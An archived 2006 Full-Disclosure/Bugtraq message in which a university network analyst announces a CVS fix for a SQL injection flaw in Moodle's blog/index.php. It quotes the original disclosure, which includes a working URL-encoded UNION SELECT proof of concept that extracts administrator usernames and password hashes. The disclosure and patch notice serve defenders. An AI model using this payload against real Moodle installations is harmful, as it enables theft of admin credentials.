lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <452A28B6.1080500@unigranrio.com.br>
Date: Mon, 09 Oct 2006 07:47:18 -0300
From: "scsantos@...granrio com br" <scsantos@...granrio.com.br>
To: disfigure <disfigure@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: SQL injection - moodle

A security vulnerability was recently discovered in all versions of
Moodle 1.6 and later that allows SQL injection. A quick one-line fix has
already been added to CVS to patch this problem for 1.6.x and 1.7 versions.

Update your servers using CVS as soon as possible, or edit the file
blog/index.php in your copy manually as described here:

    http://cvs.moodle.com/blog/index.php?r1=1.18.2.2&r2=1.18.2.3

Att,

Silvio Cesar L. dos Santos
Analista de Redes Pleno
DTI - Divisão de Tecnologia da Informação
UNIGRANRIO - Universidade do Grande Rio
+55 21 2672-7720
silviocesar@...granrio.edu.br
scsantos@...granrio.com.br
http://www.unigranrio.br


disfigure wrote:
> /****************************************/
> http://www.w4cking.com
> 
> Product:
> moodle 1.6.2
> http://www.moodle.org
> 
> Vulnerability:
> SQL injection
> 
> Notes:
> - SQL injection can be used to obtain password hash
> - the moodle blog "module" must be enabled
> - guest access to the blog must be enabled
> 
> POC:
> <target>/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20mdl_user%20u%20WHERE%201%3D0%2527,1,1,%25271
> 
> 
> Original advisory (requires registration):
> http://w4ck1ng.com/board/showthread.php?t=1305
> /****************************************/
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ